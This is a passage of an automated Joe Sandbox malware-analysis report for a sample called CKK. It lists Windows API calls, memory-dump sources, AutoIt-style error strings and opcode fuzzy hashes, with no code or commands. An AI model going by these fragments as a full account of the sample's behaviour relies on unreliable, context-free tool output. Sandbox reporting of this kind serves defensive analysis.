                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A68310
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A68324
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A68356
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A6838C
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A68395
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1464919966-438819550
                                                                                              • Opcode ID: 24d0e581f54b05c1cc58300b6567fc038a77ed6792828b46d24e275f2037d71a
                                                                                              • Instruction ID: e6089800be01623371d2e5e6337f2e3225a84bdeb7ddb330eae2b81639cb6863
                                                                                              • Opcode Fuzzy Hash: 24d0e581f54b05c1cc58300b6567fc038a77ed6792828b46d24e275f2037d71a
                                                                                              • Instruction Fuzzy Hash: 40614BB25043059FCB10EF64C850AAEB3FCFF89324F04891AF99997251EB35E945CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A633CF
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A633F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString$_wcslen
                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 4099089115-3080491070
                                                                                              • Opcode ID: 3f7f0997056c28eb24d53ae30abe4fd03b154a6f89cc190a2c24a37208817827
                                                                                              • Instruction ID: b7afa29ce44faed64a91358592b41f9923bf25a440d6f3a82f782125c6dcb7b5
                                                                                              • Opcode Fuzzy Hash: 3f7f0997056c28eb24d53ae30abe4fd03b154a6f89cc190a2c24a37208817827
                                                                                              • Instruction Fuzzy Hash: FC517A72900209AADF15EBE0CE46EFEB7B8AF44344F104465F606721A2EB752F59DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                              • API String ID: 1256254125-769500911
                                                                                              • Opcode ID: 59800f0fd528e7ce96cd41b9ee3c9f38864029b1c6d480d1c827fcfeae0c3ebe
                                                                                              • Instruction ID: 96dbfb88db9b271f70e7e152943d96fe48c6e36b4e6df37e3cf97880c0a5addb
                                                                                              • Opcode Fuzzy Hash: 59800f0fd528e7ce96cd41b9ee3c9f38864029b1c6d480d1c827fcfeae0c3ebe
                                                                                              • Instruction Fuzzy Hash: 3541F432A100269ACB205F7D89905BEB7A5BFA4756B244129EC21DB684E735CD85C7A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A653A0
                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A65416
                                                                                              • GetLastError.KERNEL32 ref: 00A65420
                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00A654A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                              • API String ID: 4194297153-14809454
                                                                                              • Opcode ID: 0c5f1f15685d4953eeca8c426b6479f99daab6328a0fcd497dd26308545309aa
                                                                                              • Instruction ID: 78629e2b99facdd38f90c3b18dfb1dba88157c04ed235aef285f4b33f98cf6ed
                                                                                              • Opcode Fuzzy Hash: 0c5f1f15685d4953eeca8c426b6479f99daab6328a0fcd497dd26308545309aa
                                                                                              • Instruction Fuzzy Hash: 01319075E006089FC710DF78C488BEABBB9EF45305F1480A5E506CB292DB75DD86CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A83A9D
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A83AA0
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A83AC7
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A83AEA
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A83B62
                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A83BAC
                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A83BC7
                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A83BE2
                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A83BF6
                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A83C13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 312131281-0
                                                                                              • Opcode ID: b79833e4fc05064d4d02f1f74bbf80911b3499813825620cc8f52acc2fcf35b4
                                                                                              • Instruction ID: 5118106a9869666402f7fd3a11511658c6674118791953115f0aa149387e0a1e
                                                                                              • Opcode Fuzzy Hash: b79833e4fc05064d4d02f1f74bbf80911b3499813825620cc8f52acc2fcf35b4
                                                                                              • Instruction Fuzzy Hash: 06617DB5A00248AFDB10DFA8CD81EEE77B8EF09710F104199FA15E7292D774AE45DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00A5A1E1,?,00000001), ref: 00A5B151
                                                                                              • GetForegroundWindow.USER32 ref: 00A5B165
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00A5B16C
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00A5B17B
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A5B18D
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A5B1A6
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00A5B1B8
                                                                                              • AttachThreadInput.USER32(00000000,00000000), ref: 00A5B1FD
                                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00A5B212
                                                                                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 00A5B21D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2156557900-0
                                                                                              • Opcode ID: 230a90d83e95e0d15bd673cfc807cd0d4eb38687560a5098437d12511c1b7800
                                                                                              • Instruction ID: f31c4e19c2e99c9b0805ea3ceac3d01663f305d575fe6c53f997387590685839
                                                                                              • Opcode Fuzzy Hash: 230a90d83e95e0d15bd673cfc807cd0d4eb38687560a5098437d12511c1b7800
                                                                                              • Instruction Fuzzy Hash: B9316B76520604BFDB10DFA4EC48FAD7BA9BB51323F118125FE06D61A0D7B49A468F70
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A22C94
                                                                                                • Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
                                                                                                • Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0
                                                                                              • _free.LIBCMT ref: 00A22CA0
                                                                                              • _free.LIBCMT ref: 00A22CAB
                                                                                              • _free.LIBCMT ref: 00A22CB6
                                                                                              • _free.LIBCMT ref: 00A22CC1
                                                                                              • _free.LIBCMT ref: 00A22CCC
                                                                                              • _free.LIBCMT ref: 00A22CD7
                                                                                              • _free.LIBCMT ref: 00A22CE2
                                                                                              • _free.LIBCMT ref: 00A22CED
                                                                                              • _free.LIBCMT ref: 00A22CFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: d6c9d7be66b5f412ec8ab67a050a0aca723c1c8891cdfcdf9dfe76bc21851896
                                                                                              • Instruction ID: 225d0b6f21af32b072c47b082820044606b06cd1bc2e96a957339f151436b48e
                                                                                              • Opcode Fuzzy Hash: d6c9d7be66b5f412ec8ab67a050a0aca723c1c8891cdfcdf9dfe76bc21851896
                                                                                              • Instruction Fuzzy Hash: 22118976500118BFCB02EF58EA82EDD3BA5FF49350F9145A5F9485F222D631EE909B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009F1459
                                                                                              • OleUninitialize.OLE32 ref: 009F14F8
                                                                                              • UnregisterHotKey.USER32(?), ref: 009F16DD
                                                                                              • DestroyWindow.USER32 ref: 00A324B9
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00A3251E
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A3254B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                              • String ID: close all
                                                                                              • API String ID: 469580280-3243417748
                                                                                              • Opcode ID: fe5f7f2b7c5134866411c2515632a24793388a4459203af4ebdb8826c0f1220b
                                                                                              • Instruction ID: fe00cf608707e1c7ed06d3ae56bdbcf695e779799b82a583315de0f5521cc9b4
                                                                                              • Opcode Fuzzy Hash: fe5f7f2b7c5134866411c2515632a24793388a4459203af4ebdb8826c0f1220b
                                                                                              • Instruction Fuzzy Hash: 43D18A31701216CFCB29EF15D999B29F7A4BF45710F1442ADF64AAB2A1DB30AD12CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowLongW.USER32 ref: 009F5C7A
                                                                                                • Part of subcall function 009F5D0A: GetClientRect.USER32 ref: 009F5D30
                                                                                                • Part of subcall function 009F5D0A: GetWindowRect.USER32(?,?), ref: 009F5D71
                                                                                                • Part of subcall function 009F5D0A: ScreenToClient.USER32(?,?), ref: 009F5D99
                                                                                              • GetDC.USER32 ref: 00A346F5
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A34708
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A34716
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A3472B
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00A34733
                                                                                              • MoveWindow.USER32(?,?,?,?,?,?), ref: 00A347C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                              • String ID: U
                                                                                              • API String ID: 4009187628-3372436214
                                                                                              • Opcode ID: 5477ec94926cabe06b1ab53b906d3bf2551020f936e7de2d62207cc2c5d88d51
                                                                                              • Instruction ID: a2964a9fefce52e0c89d7ae55fb9b03553a8b1a37380d2aee98cb6d5aeace189
                                                                                              • Opcode Fuzzy Hash: 5477ec94926cabe06b1ab53b906d3bf2551020f936e7de2d62207cc2c5d88d51
                                                                                              • Instruction Fuzzy Hash: 5471BD31500209DFCF21CF64CD85ABA7BB5FF4A364F144269FE965A2A6C731A881DF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00A635E4
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • LoadStringW.USER32(00AC2390,?,00000FFF,?), ref: 00A6360A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString$_wcslen
                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 4099089115-2391861430
                                                                                              • Opcode ID: d8ae871546edb325395045f80a2c1f2f861ba4beb98ba7e4dfc00f33e3f26afd
                                                                                              • Instruction ID: 07d37d326d4943c70bae5ae9dad33db107fb858cf4ea796165368efee813c892
                                                                                              • Opcode Fuzzy Hash: d8ae871546edb325395045f80a2c1f2f861ba4beb98ba7e4dfc00f33e3f26afd
                                                                                              • Instruction Fuzzy Hash: 56516A72900209BADF15EBA0DD42FEEBB78EF45344F044125F605761A2EB701A9ADFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2
                                                                                                • Part of subcall function 00A0912D: GetCursorPos.USER32(?), ref: 00A09141
                                                                                                • Part of subcall function 00A0912D: ScreenToClient.USER32(00000000,?), ref: 00A0915E
                                                                                                • Part of subcall function 00A0912D: GetAsyncKeyState.USER32 ref: 00A09183
                                                                                                • Part of subcall function 00A0912D: GetAsyncKeyState.USER32 ref: 00A0919D
                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00A88B6B
                                                                                              • ImageList_EndDrag.COMCTL32 ref: 00A88B71
                                                                                              • ReleaseCapture.USER32 ref: 00A88B77
                                                                                              • SetWindowTextW.USER32 ref: 00A88C12
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A88C25
                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00A88CFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                              • API String ID: 1924731296-2107944366
                                                                                              • Opcode ID: b81e9f6b7ed91ad4925029cf54b6d29a41ee1351d420b617d24034c4e4f31239
                                                                                              • Instruction ID: b1ed077e89412d0e71257f7823e5df5348da805933c47cd7cb9f57c3492f083f
                                                                                              • Opcode Fuzzy Hash: b81e9f6b7ed91ad4925029cf54b6d29a41ee1351d420b617d24034c4e4f31239
                                                                                              • Instruction Fuzzy Hash: DF519CB0204304AFD704EF64DD96FAA77E4FB88754F400A2DF996972E2DB749904CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A6C272
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A6C29A
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A6C2CA
                                                                                              • GetLastError.KERNEL32 ref: 00A6C322
                                                                                              • SetEvent.KERNEL32(?), ref: 00A6C336
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00A6C341
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3113390036-3916222277
                                                                                              • Opcode ID: 85001e3545da5893f1f094671b8b646b976b9fec3b78492dab3110bb9aa96ffe
                                                                                              • Instruction ID: 6333be53a9b28c7b0b9bb7e3c30e6031e3371c4e2af262dd64991ccacd80c7f4
                                                                                              • Opcode Fuzzy Hash: 85001e3545da5893f1f094671b8b646b976b9fec3b78492dab3110bb9aa96ffe
                                                                                              • Instruction Fuzzy Hash: 46316DB1600208AFD721EFA49988ABBBAFCEB49764B10851EF48697240DB34DD059B70
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A33AAF,?,?,Bad directive syntax error,00A8CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A598BC
                                                                                              • LoadStringW.USER32(00000000,?,00A33AAF,?), ref: 00A598C3
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • MessageBoxW.USER32 ref: 00A59987
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                              • API String ID: 858772685-4153970271
                                                                                              • Opcode ID: 7cfec5d950c9473c3bbadaa47f885ffe481575724fa4924fa8182830dee1e558
                                                                                              • Instruction ID: 420eab664b93c6b58b5dba35b63730c7569df603d67dec545fcc0687b0473682
                                                                                              • Opcode Fuzzy Hash: 7cfec5d950c9473c3bbadaa47f885ffe481575724fa4924fa8182830dee1e558
                                                                                              • Instruction Fuzzy Hash: 69214B3280021EFBCF16EF90CC06FEE7779BF18341F044869F619660A2EA759618DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 00A520AB
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00A520C0
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A5214D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameParentSend
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 1290815626-3381328864
                                                                                              • Opcode ID: 8db95134c3464875cf6279ff2d022b20e94b1f8f8abfc891a1cbb4621bc3d633
